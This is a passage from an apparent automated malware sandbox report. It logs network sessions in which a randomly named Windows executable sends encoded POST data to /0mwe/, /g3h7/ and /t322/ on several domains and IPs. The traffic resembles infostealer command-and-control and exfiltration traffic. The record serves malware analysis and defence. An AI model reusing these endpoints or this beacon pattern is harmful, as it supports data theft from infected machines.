                                                                              5 | 192.168.2.8 | 49714 | 103.224.182.242 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:27:37.712532997 CET | 625 | OUT | POST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UVMKqshnYVCCyXrPRxGrHAxURHn9Z8eOjQkYjos=
                                                                              Jan 11, 2025 09:27:38.335285902 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:38 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584058.5003721; expires=Tue, 09-Jan-2035 08:27:38 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.8 | 49715 | 103.224.182.242 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:27:40.260031939 CET | 645 | OUT | POST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZ/REPLcLDm5z0o9/7NIJfJ4OTG8KzIBig20YlN
                                                                              Jan 11, 2025 09:27:40.844782114 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:40 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584060.1234156; expires=Tue, 09-Jan-2035 08:27:40 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.8 | 49716 | 103.224.182.242 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:27:42.808207035 CET | 1662 | OUT | POST /0mwe/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.madhf.tech
                                                                              Origin: http://www.madhf.tech
                                                                              Referer: http://www.madhf.tech/0mwe/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aDeHfD5qIUOvc83JyjkZ1fXMF/TGy8uI88DAd0w+8Pg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNMgEKxQMHWecCpRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOvHZ4juzC7zPOrp173Yu19Gtyz1lycKhnkctJjtURxKTLVSn1OtKs4UAePRIv7FA28CVtaAB1icCzT6TTdwGs+dbLy9AldXFPlUpqXM/Kio8kKtgkFZGscJe+3BY3EZbYAs9SUGnD8FRPq4kY0m54r4UD5jDrB3emy4N6c/CMp4yC+6kAHQz/DZjXhSRhpGu0WLqZqi8vPWTQs05KewGgtuzO9j3su8Az4P2x6+xI+szdByE5LSPaQXSk03mno5EgoNrLDn23CN+BqPEzCjElMZ7QRKXaeqXtAbLRLBcQuHX1LkATxrEgWaeOOhcVinVH2CkHkoOLTFy11+XkSap3vfbBngDkJ2Kl/LcypV8s6TCtFX73XOfjclWOy86KvRmuNlaWYPm8G+Zhhzc44/NdcZWR+s4PyCVWaBVBsmcaStBxXEuppD/U4BcbVgm7X/YTGwLQDgK5vdsGqi/7cekukD8JQcpyVkV0oMKxn7rj8dhEeQFQg3UoQpvjtjYjfhFdYJdO1rWAxEdng+UAkgdYAGpEXQ08OVSPnya+wl4BQaLlEOWgyJ9NayqKOaR6bRb+wxNlNjJV+o5Q+g33+605SE [TRUNCATED]
                                                                              Jan 11, 2025 09:27:43.412242889 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:43 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584063.7482204; expires=Tue, 09-Jan-2035 08:27:43 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID: 8 | Source IP: 192.168.2.8 | Source Port: 49717 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:27:45.348301888 CET | Bytes transferred: 374 | Direction: OUT
                                                                              Data:
                                                                              GET /0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.madhf.tech
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Timestamp: Jan 11, 2025 09:27:45.957041025 CET | Bytes transferred: 1236 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 200 OK
                                                                              date: Sat, 11 Jan 2025 08:27:45 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1736584065.5728803; expires=Tue, 09-Jan-2035 08:27:45 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-length: 1523
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolo
                                                                              Timestamp: Jan 11, 2025 09:27:45.957063913 CET | Bytes transferred: 559 | Direction: IN
                                                                              Data Ascii: r="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP


                                                                              Session ID: 9 | Source IP: 192.168.2.8 | Source Port: 49737 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:27:51.025809050 CET | Bytes transferred: 655 | Direction: OUT
                                                                              Data:
                                                                              POST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiBu/VgGltaCdoY+kUkJdVYT7t4zUMznvKYIFJXQ=
                                                                              Timestamp: Jan 11, 2025 09:27:51.616153002 CET | Bytes transferred: 682 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:51 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br


                                                                              Session ID: 10 | Source IP: 192.168.2.8 | Source Port: 49756 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:27:53.572449923 CET | Bytes transferred: 675 | Direction: OUT
                                                                              Data:
                                                                              POST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY7Qt7biJE6HQ7Y1XAHHxU61LuBkvKelBISBo2VJ
                                                                              Timestamp: Jan 11, 2025 09:27:54.173511028 CET | Bytes transferred: 682 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:54 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br


                                                                              Session ID: 11 | Source IP: 192.168.2.8 | Source Port: 49774 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:27:56.120266914 CET | Bytes transferred: 1692 | Direction: OUT
                                                                              Data:
                                                                              POST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Timestamp: Jan 11, 2025 09:27:56.721045971 CET | Bytes transferred: 682 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:56 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br


                                                                              Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49790 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:27:58.666053057 CET | Bytes transferred: 384 | Direction: OUT
                                                                              Data:
                                                                              GET /g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.canadavinreport.site
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Timestamp: Jan 11, 2025 09:27:59.264357090 CET | Bytes transferred: 1198 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 997
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("3f5536e462c0f35987862bf1392a3d98");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                              Session ID: 13 | Source IP: 192.168.2.8 | Source Port: 49836 | Destination IP: 165.154.96.210 | Destination Port: 80 | PID: 3920
                                                                              Process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp: Jan 11, 2025 09:28:05.429371119 CET | Bytes transferred: 634 | Direction: OUT
                                                                              Data:
                                                                              POST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7VBTftjdWoRYTLiFBk6mA2Byj1ZktlezxYodNao=
                                                                              Timestamp: Jan 11, 2025 09:28:06.336828947 CET | Bytes transferred: 1236 | Direction: IN
                                                                              Data:
                                                                              HTTP/1.1 404 Not Found
                                                                              Server: F-WEB
                                                                              Date: Sat, 11 Jan 2025 08:28:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575614038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=_UTSvlG0b9Rtm3Xb; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:06 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:06 GMT; HttpOnly
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                               Jan 11, 2025 09:28:06.336844921 CET  425 bytes  IN  Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                               Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                               14  192.168.2.8  49856  165.154.96.210  80  3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                               Timestamp  Bytes transferred  Direction  Data
                                                                               Jan 11, 2025 09:28:07.982609034 CET  654 bytes  OUT  POST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2pZj2xSoSDbr74tTN+01vlCY8GaAwvgvJjPGVCR
                                                                               Jan 11, 2025 09:28:08.906744003 CET  1236 bytes  IN  HTTP/1.1 404 Not Found
                                                                              Server: F-WEB
                                                                              Date: Sat, 11 Jan 2025 08:28:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575740038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=VehwFfocxX7HcZ8x; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:08 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:08 GMT; HttpOnly
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                               Jan 11, 2025 09:28:08.906780005 CET  425 bytes  IN  Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                               Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                               15  192.168.2.8  49873  165.154.96.210  80  3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                               Timestamp  Bytes transferred  Direction  Data
                                                                               Jan 11, 2025 09:28:10.528428078 CET  1671 bytes  OUT  POST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBGygRGZKtUFvnyW6jd4VWN/a0PpUN/uRKgCl5fzbHwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ju12z0eAoyTv50Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5WXMYIeOkVC86mqruC01xPWWuTQEf9QhTsbJtLiIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAg5UGUbfr+EiEN2Zrk8Nstvpde4lUeBtRr2Iva/rAfyilJlbS2oShRdZkOUb3946TbpR+5RzyUetqoPSnLp7UttKHeRca3X+UTQzCOoIcaB+vW6wsVqiGt8Vx0X7b1Cy4geKeerRr81XygcEj/9SKUuhWkU8uyVFMyN0FEu+kEVEl/e1MJfYZjgSxpB3lwNg8vu9/mNVrsNEKxYVPzHML6o5ZJ//ouBvGo1Bu2l61GfBliMl4FfvujfOkpoE1Wpb/0MPWBmyqSLnYua/JbtTMbEtmm0eRqs3J+hPwMf03EcC+SAjgMP/aZw3VfgJ7uqJAO3PNPuzf6K30Q5YScmatITyMyrTmPc+gRiNu/GFfMh6q0zbOpxVgcTmnbgnM+gBoUePMXQH4qgl2oO8c6MkxycQjnOqnYAMHlFYUuu1LJ6We1m3B8Ez/UNwaB3SjOBs6KnDTMBwyq3vFbHZGaN+/D0O6IRu/I/0/OKJJWFM3X60Sb0Oq+2zp7Gjz+yG5IiPbFlCdTFwuLxs4I6W [TRUNCATED]
                                                                               Jan 11, 2025 09:28:11.490312099 CET  1236 bytes  IN  HTTP/1.1 404 Not Found
                                                                              Server: F-WEB
                                                                              Date: Sat, 11 Jan 2025 08:28:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575887038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=uwad7gHnuwC5boAu; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:11 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:11 GMT; HttpOnly
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                               Jan 11, 2025 09:28:11.490329027 CET  425 bytes  IN  Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                               Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                               16  192.168.2.8  49889  165.154.96.210  80  3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                               Timestamp  Bytes transferred  Direction  Data
